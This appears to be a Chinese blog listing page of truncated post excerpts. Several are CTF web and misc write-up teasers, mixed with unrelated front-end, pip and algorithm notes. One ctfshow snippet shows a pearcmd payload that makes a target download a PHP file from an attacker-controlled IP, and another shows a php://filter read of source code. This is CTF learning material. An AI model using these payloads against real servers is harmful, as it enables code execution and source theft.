bugku-web bugku web 29

以下是对字体图标、2D转换、3D转换、动画rem、vw/vh、Flex布局模型、Less基础语法、视口分辨率、二倍图、移动适配、媒体查询、媒体查询bootstrap框架、栅格系统、组件和响应式网页布局的详细描述，并附上一些相关的代码示例。 1. 字体图标： 字体图标是使用特殊字体文件中的字符来显示图 ......

### 问题1 问题描述：pip安装virtualenvwrapper，在/usr/local/bin目录下找不到virtualenvwrapper.sh 原因：猜测为**权限问题**： `/usr/local/bin`为当前系统的管理员权限的目录，没有足够的权限来写入该目录，那么安装可能会失败。 ......

​ 1.编辑器修改 (可选) 1.1在 ueditor/config.json 中添加代码块 /* 上传word配置 */ "wordActionName": "wordupload", /* 执行上传视频的action名称 */ "wordFieldName": "upfile", /* 提交的视 ......

# summer ## Problem ## Solution 挺好的题，题解也写得很清楚，因此我不过是把题解抄一遍。 赛时打了 $40$ 分，然后挂了 $20$ 分，因为不会前缀和（这个人暴力求区间和，铸币吧）。 前 $40$ 分就是记忆化搜索 + 单调栈： >首先考察对于一个确定的序列，如何求出 ......

WEB 技术（WEB 攻击面，HTTP 协议基础，AJAX，WEB Service）、扫描工具（HTTrack，Nikto，Skipfish，Arachni，OWASP-ZAP，BurpSuite，AWVS，AppScan）、其他工具（SQLmap，XSSer，BeEF，Weevely，OpenSS... ......

## 前端性能优化 1. 压缩传输的数据量，如使用Gzip或Deflate来压缩HTML、CSS和JavaScript等静态资源。压缩文件可以通过消除空格、注释、无用代码和变量重命名等方式来减小文件大小。合并文件可以减少HTTP请求的数量，提高加载效率。使用工具如Webpack或Gulp可以自动化这 ......

 没啥思路，感觉自己在刷题，，， 这个考虑的是本地管理员 ![images](https://img2 ......

这是sql的注入题 我自己的sql注入学的还不是很到位，这个题目有很学习的意味：；；  第一个是通过sq ......

 比较简单的题目， ![images](https://img2023.cnblogs.com/blog ......

 我比较才，他给的网址就是一直弹框，flag就在这里，我打开了bp但是束手无策，打开了F2也看不到源网页 ......

打开页面之后一直在刷新（也可以说是窗口重新加载？）  最近刚学了js脚本，浏览器右键检查源代码，发现有一 ......

 这个很简单！！！ ![images](https://img2023.cnblogs.com/blo ......

 ![images](https://img2023.cnblogs.com/blog/1845942 ......

 根据题意进行unescape解码，得到js脚本，将js脚本中的代码填入输入框中点击提交就得到了fla ......

 php://filter/read=convert.base64-encode/resource=in ......

node.js原型链污染 不是很理解  用dirsearch扫出后台后下载www.zip得到了源码，然 ......

 根据提示LSB BGR 方式去获取图片中的隐藏信息 使用工具StegSolve ![images](h ......

``` 其实这一题灵感是来自于b站一个puzzle up主的一个投稿，就叫重叠拼图，就是两块拼图之间有大量的重叠部分。我按照原理，参考了机气人师傅和狸师傅的代码，写了这个算法，把底图加flag后分成20x20像素的方块，然后每个方块找一个随机点作为圆心将图片旋转随机角度，然后以圆心为中心截取一个80 ......

打开文件，选择不同发送包可以看到数据部分的前几位在变换，将这两位复制出来拼接即可得到flag。  ......

 刚结束的ciscn，里面的要是有这么简单就好了。 下载附件，是个pcap文件，打开wireshark ......

 这题是自己独立完成的！！！ 首先下载附件！！！ 解压缩发现是个docx文档，wps提示可以修复，但是 ......

 下载下来的附件！打开都是1和0的组合！ ![images](https://img2023.cnbl ......

 有点意思的题目，看了一下评论区。 有了解题思路。 首先解压附件，可以得到一张照片。 ![images ......

 这个题目对于菜鸡来说真的有点难呐。。 总结一下： 左： 图片分离，可以看到图片里有rar文件； hi ......

 这个题目的考察的还是代码审计，还有eval函数的利用，当然还有对过滤这些因素的审查。 代码块就直接放 ......

 真社工... ![images](https://img2023.cnblogs.com/blog/ ......

前言：我在项目中引入了阿里云的图标库iconfont.css，如： .icon-wodewo:before { content: "\e6e0"; } .icon-jiaocheng-1:before { content: "\e78d"; } .icon-weixin:before { conte ......

* 源代码 ``` ``` * 解法 借助代码执行和字符串输出的区别进行延迟触发。 payload： http://url.challenge.ctf.show/?c=pearcmd&+download+http://公网IP/1.php 1.php： `"; ?>` 上传成功后显示： ``` do ......

#### A 大模拟。还是博弈题。 你说得对，但是《巫师 $3$：狂猎》是由 $\rm CDPR$ 自主研发的一款全新开放世界卡牌游戏。游戏发生在一个“天球交汇”后的幻想世界，在这里，通过青草试炼的人将成为「猎魔人」，导引魔法之力。你将扮演一位名为「杰洛特」的猎魔人在自由的旅行中邂逅性格各异、能力独 ......

citespace更新速度快，网上很多教程基于版本citespace5，因此在安装时会提示版本过低不能安装以及其他的问题。 本文以citespace 6.2.R4为例，介绍最新安装方法。 【提醒】 如果之前计算机里已经安装了jdk或jre，请提前卸载清理（卸载+剔除环境变量） 【准备工作】 jdk8 ......